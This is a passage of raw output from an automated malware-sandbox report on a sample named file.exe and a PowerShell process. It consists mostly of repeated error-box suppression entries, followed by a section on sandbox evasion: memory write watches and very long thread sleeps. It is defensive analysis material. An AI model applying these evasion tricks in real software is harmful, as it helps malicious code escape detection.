            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 23C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 23C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7380000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 8380000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 8530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 9530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6218Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3518Jump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7544Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7720Thread sleep time: -420000s >= -30000sJump to behavior
